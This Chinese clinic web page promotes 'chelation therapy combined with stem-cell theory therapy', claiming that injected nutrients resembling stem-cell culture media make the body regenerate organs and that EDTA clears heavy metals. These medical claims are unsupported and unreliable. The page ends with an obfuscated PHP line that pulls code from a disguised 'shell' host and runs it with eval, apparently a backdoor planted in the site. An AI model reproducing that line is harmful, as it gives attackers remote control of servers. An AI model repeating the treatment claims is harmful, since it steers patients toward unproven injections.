收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 螯合療法合併幹細胞理論療法
螯合療法合併幹細胞理論療法 列印 E-mail
(幹細胞療法VS幹細胞理論療法。水耕農作VS有機農作)
       「幹細胞療法」是取出人體內原始的幹細胞,如人體胚胎、臍帶血、體細胞或骨髓,在體外培養,以不同比例的營養如:維他命、胺基酸、礦物質、抗氧化劑、微量元素…等做為培養基,培養出不同器官的細胞,再打入人體。

這種醫療方法必需在醫學中心施作,絕非一般診所拿一瓶針劑施打在患者身上,即宣稱這是「幹細胞療法」,「幹細胞療法」如同水耕蔬菜,是由人所設定的營養成分去種植出蔬菜,同理「幹細胞療法」也是由人所設定的營養去培養出幹細胞,我們深信土地中一定有水耕蔬菜所沒有的地利與養分,就如同人體內一定有幹細胞培養基中所沒有的營養,因此將水耕蔬菜養分直接灌溉入土中所種植出的蔬菜,一定比單純水耕蔬菜品質優良,同理將幹細胞培養基的養分直接打入人體,誘發人體內原有幹細胞再生的「幹細胞理論療法」,當然比只由培養基中所培養出的「幹細胞療法」更直接有效。

        患者因為不同的疾病,所以受傷的器官也不相同,因此我們檢測不同體質的個人,需要幹細胞再生的細胞組織也不相同,給予的營養比例也不一樣。每個人體內器官均有潛在的幹細胞,我們依照個別的需要,將不同比例的營養直接打入人體內,可以活化自體體內的幹細胞,由各個器官內的幹細胞直接吸收的養分,再生成各器官的細胞與組織,就相當於在體內直接培養幹細胞,不需在體外培養,冒感染、變性…的危險,更直接有效地讓每個組織中的幹細胞就地分化再生完成,這樣的作法稱之為「幹細胞理論療法」。

        「幹細胞療法」在醫學上絕對有其存在的必要,如人體器官嚴重毀損,急救時需要大量組織細胞的修復,「幹細胞療法」可發揮最大的效益,但在慢性疾病或調養身體時,則「幹細胞理論療法」絕對佔優勢,畢竟由自己身體幹細胞所分化出的組織細胞,才是修復自己受損細胞品質最優與最佳的細胞。

「螯合療法」是用EDTA清除體內的重金屬。體內的重金屬就如同齒輪中的沙子,就算加了再多的潤滑油,也容易讓齒輪受傷;如果齒輪中的沙子清除掉,只需加一些潤滑油即可讓齒輪轉動順暢。施打螯合療法,就像清除齒輪中的沙子,而幹細胞所需的營養素就像齒輪的潤滑油;清除重金屬(沙子)與給予營養(加潤滑油),必須同時進行,才能讓身體恢復健康(讓齒輪轉動順暢,且不會磨損)。

        我們在國外一家銷售幹細胞培養基的公司—Invitrogen Corporation 所提供的資料中,發現它不同種類的基礎培養基處方裡。

大致分為六大類:一、無機鹽:如鈣、鎂、鉀、鈉、磷…等,二、胺基酸:各培養基所含胺基酸種類與濃度各異,三、維他命:各培養基所含維他命種類與濃度各異,四、微量元素:各培養基所含微量元素種類與濃度各異,五、蛋白質:如白蛋白..等,各培養基所含蛋白質種類與濃度各異,六、其他組成物:如乳酸鈣、葡萄糖、膽固醇….等。而這些處方內容與我們螯合療法的處方內容有百分之八十的相似度。

        「螯合療法合併幹細胞理論療法」是預防醫學與疾病治療最佳的組合,它結合了螯合療法與幹細胞理論療法做排毒,在清除體內重金屬的同時,讓體內受傷的器官與組織經由細胞再生的方式,修復受傷的器官與組織,從新建造一個相對健康的身體。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));